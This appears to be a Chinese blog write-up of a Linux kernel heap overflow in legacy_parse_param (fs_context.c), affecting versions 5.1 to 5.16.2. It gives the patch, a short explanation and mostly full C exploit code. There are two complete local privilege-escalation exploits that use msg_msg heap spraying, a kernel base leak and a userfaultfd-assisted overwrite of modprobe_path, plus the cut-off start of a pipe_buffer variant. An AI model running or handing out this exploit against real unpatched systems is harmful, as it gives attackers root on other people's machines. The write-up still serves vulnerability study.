影响版本:Linux-v5.1~v5.16.2
测试版本:Linux-5.11.22,由于懒得搞环境,所以直接用的 bsauce 大佬提供的 测试环境
看看 patch:
diff --git a/fs/fs_context.c b/fs/fs_context.c
index b7e43a780a625b..24ce12f0db32e5 100644
--- a/fs/fs_context.c
+++ b/fs/fs_context.c
@@ -548,7 +548,7 @@ static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
param->key);
}
- if (len > PAGE_SIZE - 2 - size)
+ if (size + len + 2 > PAGE_SIZE)
return invalf(fc, "VFS: Legacy: Cumulative options too large");
if (strchr(param->key, ',') ||
(param->type == fs_value_is_string &&
这里 len/size 都是无符号数,所以当 2+size > PAGE_SIZE 时,则 PAGE_SIZE - 2 - size 是一个很大的数从而绕过检查,这里会导致堆溢出。
溢出 kmem_cache:kmalloc-4k
利用思路:
1)堆喷 msg_msg,触发第一次漏洞溢出修改 m_ts 从而泄漏内核基地址
2)堆喷 msg_msg,触发第二次漏洞溢出配合 userfaultfd修改 m_next 实现任意地址写 modprobe_path
注:bsauce 佬提供的测试环境内核版本为 v5.11.22,普通用户是无法直接使用 userfaultfd 的,我看 bsauce 佬直接写了个 fuse 驱动模块,然后利用的 fuse 去增大竞争窗口。但是这里为了方便,我直接在设置了普通用户可以使用 userfaultfd,这里只是为了简化利用。
echo 1 > /proc/sys/vm/unprivileged_userfaultfd
第一版垃圾 exp 如下:这里调整一下堆喷策略效果应该会好很多
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/mount.h>
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsmount
#define __NR_fsmount 432
#endif
#ifndef __NR_move_mount
#define __NR_move_mount 429
#endif
#define SPARY_MSG_NUMS 8
int hijack_idx;
size_t modprobe_path;
int fs_fds[SPARY_MSG_NUMS];
int fsopen(const char* fs_name, unsigned int flags)
{
return syscall(__NR_fsopen, fs_name, flags);
}
int fsconfig(int fd, unsigned int cmd, const char* key, const char* value, int aux)
{
return syscall(__NR_fsconfig, fd, cmd, key, value, aux);
}
int fsmount(int fs_fd, unsigned int flags, unsigned int attr_flags)
{
return syscall(__NR_fsmount, fs_fd, flags, attr_flags);
}
int move_mount(int from_dfd, const char* from_path, int to_dfd, const char* to_path, unsigned int flags)
{
return syscall(__NR_move_mount, from_dfd, from_path, to_dfd, to_path, flags);
}
void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}
void info(char *msg)
{
printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}
void hexx(char *msg, size_t value)
{
printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}
void binary_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("\033[33m[*] %s:\n\033[0m", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}
/* bind the process to specific core */
void bind_core(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}
struct msg_buf {
long m_type;
char m_text[1];
};
struct msg_header {
void* l_next;
void* l_prev;
long m_type;
size_t m_ts;
void* next;
void* security;
};
void get_flag(){
system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x"); // modeprobe_path 修改为了 /tmp/x
system("chmod +x /tmp/x");
system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy"); // 非法格式的二进制文件
system("chmod +x /tmp/dummy");
system("/tmp/dummy"); // 执行非法格式的二进制文件 ==> 执行 modeprobe_path 指向的文件 /tmp/x
sleep(0.3);
system("cat /flag");
exit(0);
}
void register_userfaultfd(pthread_t* moniter_thr, void* addr, long len, void* handler)
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);
if (uffd < 0) perror("[X] syscall for __NR_userfaultfd"), exit(-1);
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) puts("[X] ioctl-UFFDIO_API"), exit(-1);
uffdio_register.range.start = (long long)addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) puts("[X] ioctl-UFFDIO_REGISTER"), exit(-1);
if (pthread_create(moniter_thr, NULL, handler, (void*)uffd) < 0)
puts("[X] pthread_create at register_userfaultfd"), exit(-1);
}
char copy_src[0x1000];
void* handler(void* arg)
{
struct uffd_msg msg;
struct uffdio_copy uffdio_copy;
long uffd = (long)arg;
for(;;)
{
int res;
struct pollfd pollfd;
pollfd.fd = uffd;
pollfd.events = POLLIN;
if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);
res = read(uffd, &msg, sizeof(msg));
if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);
puts("[+] Now in userfaultfd handler");
size_t buf = modprobe_path - 8;
char* x = &buf;
char str[] = "/tmp/x";
printf("hijack_idx ==> %d\n", hijack_idx);
fsconfig(fs_fds[hijack_idx], FSCONFIG_SET_STRING, "\x00", "012345678901234567890AAAAAAAA", 0);
fsconfig(fs_fds[hijack_idx], FSCONFIG_SET_STRING, "\x00", x, 0);
memset(copy_src, 0, sizeof(copy_src));
strncpy(copy_src, str, strlen(str));
strncpy(copy_src+8, str, strlen(str));
uffdio_copy.src = (long long)copy_src;
uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
}
}
size_t do_leak()
{
char X_X = 1;
int fs_fd;
char buf[0x2000];
char msg_buffer[0x2000];
int msg_qid[SPARY_MSG_NUMS];
size_t kernel_offset;
struct msg_buf* msg_buf = (struct msg_buf*)msg_buffer;
memset(msg_buffer, 0, sizeof(msg_buffer));
msg_buf->m_type = 1;
if (!X_X) goto X_X_Label;
for (int i = 0; i < SPARY_MSG_NUMS / 2; i++)
{
if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
*(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
*(uint64_t*)(msg_buf->m_text+8) = i;
if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
}
fs_fd = fsopen("ext4", 0);
if (fs_fd < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);
for (int i = 0; i < 273; i++)
{
fsconfig(fs_fd, FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);
}
fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "012345678901234567890", 0);
for (int i = SPARY_MSG_NUMS / 2; i < SPARY_MSG_NUMS; i++)
{
if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
*(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
*(uint64_t*)(msg_buf->m_text+8) = i;
if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
}
for (int i = 0; i < SPARY_MSG_NUMS*2; i++)
{
if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
}
fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "\xc8\x1f", 0);
goto GO;
X_X_Label:
fs_fd = fsopen("ext4", 0);
if (fs_fd < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);
for (int i = 0; i < 273; i++)
{
fsconfig(fs_fd, FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);
}
fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "012345678901234567890", 0);
for (int i = 0; i < SPARY_MSG_NUMS; i++)
{
if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
*(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
*(uint64_t*)(msg_buf->m_text+8) = i;
if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
}
for (int i = 0; i < SPARY_MSG_NUMS*2; i++)
{
if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
}
fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "\xc8\x1f", 0);
GO:
kernel_offset = -1;
size_t vim_mtype;
for (int i = 0; i < SPARY_MSG_NUMS; i++)
{
memset(buf, 0, sizeof(buf));
if (msgrcv(msg_qid[i], buf, 0x2000-0x30-0x8, 0, IPC_NOWAIT|MSG_COPY|MSG_NOERROR) >= 0x2000-0x30-0x8)
{
for (int k = 0; k < 0x1000 / 8; k++)
{
size_t addr = *(uint64_t*)(buf+0x1000+k*8);
vim_mtype = ((struct msg_buf*)buf)->m_type;
if (addr > 0xffffffff81000000 && (addr&0xfff) == 0x770)
{
hexx("vim_mtype", vim_mtype);
kernel_offset = addr - 0xffffffff81f36770;
hexx("kernel_offset", kernel_offset);
break;
}
}
if (!X_X) msgrcv(msg_qid[i], buf, 0x2000-0x30-0x8, vim_mtype, 0);
//binary_dump("OOB READ DATA", buf, 0x2000);
break;
}
}
return kernel_offset;
}
void hijack_modprobePath()
{
char buf[0x2000];
char msg_buffer[0x2000];
int msg_qid[SPARY_MSG_NUMS*2];
size_t kernel_offset;
struct msg_buf* msg_buf = (struct msg_buf*)msg_buffer;
memset(msg_buffer, 0, sizeof(msg_buffer));
msg_buf->m_type = 1;
for (int i = 0; i < SPARY_MSG_NUMS; i++)
{
if ((msg_qid[i*2] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
*(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
*(uint64_t*)(msg_buf->m_text+8) = i*2+1;
if (msgsnd(msg_qid[i*2], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
fs_fds[i] = fsopen("ext4", 0);
if (fs_fds[i] < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);
for (int j = 0; j < 273; j++)
{
fsconfig(fs_fds[i], FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);
}
if ((msg_qid[i*2+1] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
*(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
*(uint64_t*)(msg_buf->m_text+8) = i*2+1;
if (msgsnd(msg_qid[i*2+1], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
// if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
// *(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
// *(uint64_t*)(msg_buf->m_text+8) = i;
// if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
}
for (int i = 0; i < SPARY_MSG_NUMS; i++)
{
msgrcv(msg_qid[i], buf, 0x1000+0x20-0x30-0x8, 1, 0);
}
char* uffd_buf;
pthread_t thr[SPARY_MSG_NUMS];
for (hijack_idx = 0; hijack_idx < SPARY_MSG_NUMS; hijack_idx++)
{
msg_buf = (struct msg_buf*)buf;
msg_buf->m_type = 1;
if ((msg_qid[hijack_idx] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
if (msgsnd(msg_qid[hijack_idx], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
uffd_buf = NULL;
uffd_buf = mmap(0, 0x2000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if (uffd_buf <= 0) err_exit("FAILED to mmap uffd_buf");
register_userfaultfd(&thr[hijack_idx], uffd_buf+0x1000, 0x1000, handler);
msg_buf = (struct msg_buf*)(uffd_buf+0x30);
if ((msg_qid[hijack_idx] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
msg_buf->m_type = 1;
if (msgsnd(msg_qid[hijack_idx], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
munmap(uffd_buf, 0x2000);
}
}
int main(int argc, char** argv, char** envp)
{
bind_core(0);
pid_t pid;
int pipe_fd[2];
pipe(pipe_fd);
pid = fork();
if (!pid)
{
unshare(CLONE_NEWNS|CLONE_NEWUSER);
size_t kernel_offset;
kernel_offset = do_leak();
if (kernel_offset == -1) err_exit("FAILED to leak kernel_offset");
modprobe_path = 0xffffffff8346c160 + kernel_offset;
hexx("modprobe_path", modprobe_path);
hijack_modprobePath();
write(pipe_fd[1], "X", 1);
exit(0);
} else if (pid < 0) {
err_exit("FAILED to fork a new process");
} else {
char buf[1];
read(pipe_fd[0], buf, 1);
get_flag();
}
return 0;
}
效果如下:这里堆喷策略比较垃圾,成功率极低,后面再改改吧。
=========================================================================
修改了下堆喷策略,成功率提高了不少,虽然还不是很理想,比如受到 userfaultfd,modprobe_path可写的限制。这个好像可以直接套 pipe 构造页级UAF,后面再看看。
exp 如下:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/mount.h>
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsmount
#define __NR_fsmount 432
#endif
#ifndef __NR_move_mount
#define __NR_move_mount 429
#endif
#define SPARY_MSG_NUMS 8
size_t modprobe_path;
int fs_fds[SPARY_MSG_NUMS*2];
int fsopen(const char* fs_name, unsigned int flags)
{
return syscall(__NR_fsopen, fs_name, flags);
}
int fsconfig(int fd, unsigned int cmd, const char* key, const char* value, int aux)
{
return syscall(__NR_fsconfig, fd, cmd, key, value, aux);
}
int fsmount(int fs_fd, unsigned int flags, unsigned int attr_flags)
{
return syscall(__NR_fsmount, fs_fd, flags, attr_flags);
}
int move_mount(int from_dfd, const char* from_path, int to_dfd, const char* to_path, unsigned int flags)
{
return syscall(__NR_move_mount, from_dfd, from_path, to_dfd, to_path, flags);
}
void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}
void info(char *msg)
{
printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}
void hexx(char *msg, size_t value)
{
printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}
void binary_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("\033[33m[*] %s:\n\033[0m", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}
/* bind the process to specific core */
void bind_core(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}
struct msg_buf {
long m_type;
char m_text[1];
};
struct msg_header {
void* l_next;
void* l_prev;
long m_type;
size_t m_ts;
void* next;
void* security;
};
void get_flag(){
system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x"); // modeprobe_path 修改为了 /tmp/x
system("chmod +x /tmp/x");
system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy"); // 非法格式的二进制文件
system("chmod +x /tmp/dummy");
system("/tmp/dummy"); // 执行非法格式的二进制文件 ==> 执行 modeprobe_path 指向的文件 /tmp/x
sleep(0.3);
system("cat /flag");
}
void register_userfaultfd(pthread_t* moniter_thr, void* addr, long len, void* handler)
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);
if (uffd < 0) perror("[X] syscall for __NR_userfaultfd"), exit(-1);
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) puts("[X] ioctl-UFFDIO_API"), exit(-1);
uffdio_register.range.start = (long long)addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) perror("[X] ioctl-UFFDIO_REGISTER"), exit(-1);
if (pthread_create(moniter_thr, NULL, handler, (void*)uffd) < 0)
puts("[X] pthread_create at register_userfaultfd"), exit(-1);
}
char copy_src[0x1000];
void* handler(void* arg)
{
struct uffd_msg msg;
struct uffdio_copy uffdio_copy;
long uffd = (long)arg;
for(;;)
{
int res;
struct pollfd pollfd;
pollfd.fd = uffd;
pollfd.events = POLLIN;
if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);
res = read(uffd, &msg, sizeof(msg));
if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);
puts("[+] Now in userfaultfd handler");
size_t buf = modprobe_path - 8;
char* x = &buf;
char str[] = "/tmp/x";
for (int i = 0; i < SPARY_MSG_NUMS*2; i++)
{
fsconfig(fs_fds[i], FSCONFIG_SET_STRING, "\x00", "012345678901234567890AAAAAAAA", 0);
fsconfig(fs_fds[i], FSCONFIG_SET_STRING, "\x00", x, 0);
}
memset(copy_src, 0, sizeof(copy_src));
strncpy(copy_src, str, strlen(str));
strncpy(copy_src+8, str, strlen(str));
uffdio_copy.src = (long long)copy_src;
uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
}
}
size_t do_leak()
{
int fs_fd;
char buf[0x2000];
char msg_buffer[0x2000];
int msg_qid[SPARY_MSG_NUMS*2];
size_t kernel_offset;
struct msg_buf* msg_buf = (struct msg_buf*)msg_buffer;
memset(msg_buffer, 0, sizeof(msg_buffer));
msg_buf->m_type = 1;
for (int i = 0; i < 20; i++)
{
if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
}
for (int i = 0; i < SPARY_MSG_NUMS; i++)
{
if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
*(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
*(uint64_t*)(msg_buf->m_text+8) = i;
if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
}
fs_fd = fsopen("ext4", 0);
if (fs_fd < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);
for (int i = 0; i < 273; i++)
{
fsconfig(fs_fd, FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);
}
fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "012345678901234567890", 0);
for (int i = 0; i < 10; i++)
{
if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
}
for (int i = SPARY_MSG_NUMS; i < SPARY_MSG_NUMS*2; i++)
{
if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
*(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
*(uint64_t*)(msg_buf->m_text+8) = i;
if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
}
for (int i = 0; i < 30; i++)
{
if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
}
fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "\xc8\x1f", 0);
kernel_offset = -1;
size_t vim_mtype;
for (int i = 0; i < SPARY_MSG_NUMS*2; i++)
{
memset(buf, 0, sizeof(buf));
if (msgrcv(msg_qid[i], buf, 0x2000-0x30-0x8, 0, IPC_NOWAIT|MSG_COPY|MSG_NOERROR) >= 0x2000-0x30-0x8)
{
for (int k = 0; k < 0x1000 / 8; k++)
{
size_t addr = *(uint64_t*)(buf+0x1000+k*8);
vim_mtype = ((struct msg_buf*)buf)->m_type;
if (addr > 0xffffffff81000000 && (addr&0xfff) == 0x770)
{
hexx("vim_mtype", vim_mtype);
kernel_offset = addr - 0xffffffff81f36770;
hexx("kernel_offset", kernel_offset);
break;
}
}
//binary_dump("OOB READ DATA", buf, 0x2000);
break;
}
}
return kernel_offset;
}
void hijack_modprobePath()
{
puts("==> hijack modprobe_path <==");
char buf[0x2000];
char msg_buffer[0x2000];
int msg_qid[SPARY_MSG_NUMS];
int qid;
size_t kernel_offset;
struct msg_buf* msg_buf = (struct msg_buf*)msg_buffer;
memset(msg_buffer, 0, sizeof(msg_buffer));
msg_buf->m_type = 1;
for (int i = 0; i < SPARY_MSG_NUMS; i++)
{
fs_fds[i*2] = fsopen("ext4", 0);
if (fs_fds[i*2] < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);
for (int j = 0; j < 273; j++)
{
fsconfig(fs_fds[i*2], FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);
}
// if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
// if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
if (i == SPARY_MSG_NUMS / 2)
{
if ((qid = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
if (msgsnd(qid, msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
}
fs_fds[i*2+1] = fsopen("ext4", 0);
if (fs_fds[i*2+1] < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);
for (int j = 0; j < 273; j++)
{
fsconfig(fs_fds[i*2+1], FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);
}
}
// for (int i = 0; i < SPARY_MSG_NUMS; i++)
// {
// if (msgrcv(msg_qid[i], buf, 0x1000+0x20-0x30-0x8, 1, 0) < 0)
// err_exit("FAILED to msgrcv msg");
// }
if (msgrcv(qid, buf, 0x1000+0x20-0x30-0x8, 1, 0) < 0)
err_exit("FAILED to msgrcv msg");
pthread_t thr;
char* uffd_buf;
msg_buf = (struct msg_buf*)msg_buffer;
msg_buf->m_type = 1;
// for (int i = 0; i < SPARY_MSG_NUMS / 3; i++)
// {
// if ((qid = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
// if (msgsnd(qid, msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
//
// }
uffd_buf = mmap(0, 0x2000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if (uffd_buf <= 0) err_exit("FAILED to mmap for uffd_buf");
register_userfaultfd(&thr, uffd_buf+0x1000, 0x1000, handler);
msg_buf = (struct msg_buf*)(uffd_buf+0x30);
msg_buf->m_type = 1;
if ((qid = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
if (msgsnd(qid, msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
}
int main(int argc, char** argv, char** envp)
{
bind_core(0);
pid_t pid;
int pipe_fd[2];
pipe(pipe_fd);
pid = fork();
if (!pid)
{
unshare(CLONE_NEWNS|CLONE_NEWUSER);
size_t kernel_offset;
kernel_offset = do_leak();
if (kernel_offset == -1) err_exit("FAILED to leak kernel_offset");
modprobe_path = 0xffffffff8346c160 + kernel_offset;
hexx("modprobe_path", modprobe_path);
hijack_modprobePath();
write(pipe_fd[1], "X", 1);
puts("[+] CHILED END");
exit(0);
} else if (pid < 0) {
err_exit("FAILED to fork a new process");
} else {
char buf[1];
read(pipe_fd[0], buf, 1);
get_flag();
puts("[+] PARENT NED");
}
puts("[+] OVER");
return 0;
}
=========================================================================
尝试套了下自写管道系统的板子,成功率还行,失败的主要原因在于pipe_buffer与漏洞堆块不相邻导致溢出写失败
exp如下:
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/mount.h>
#include <sys/prctl.h>
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsmount
#define __NR_fsmount 432
#endif
#ifndef __NR_move_mount
#define __NR_move_mount 429
#endif
int fsopen(const char* fs_name, unsigned int flags)
{
return syscall(__NR_fsopen, fs_name, flags);
}
int fsconfig(int fd, unsigned int cmd, const char* key, const char* value, int aux)
{
return syscall(__NR_fsconfig, fd, cmd, key, value, aux);
}
int fsmount(int fs_fd, unsigned int flags, unsigned int attr_flags)
{
return syscall(__NR_fsmount, fs_fd, flags, attr_flags);
}
int move_mount(int from_dfd, const char* from_path, int to_dfd, const char* to_path, unsigned int flags)
{
return syscall(__NR_move_mount, from_dfd, from_path, to_dfd, to_path, flags);
}
size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
size_t init_task, init_nsproxy, init_cred;
size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
size_t page_count;
page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;
return vmemmap_base + page_count * 0x40;
}
void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}
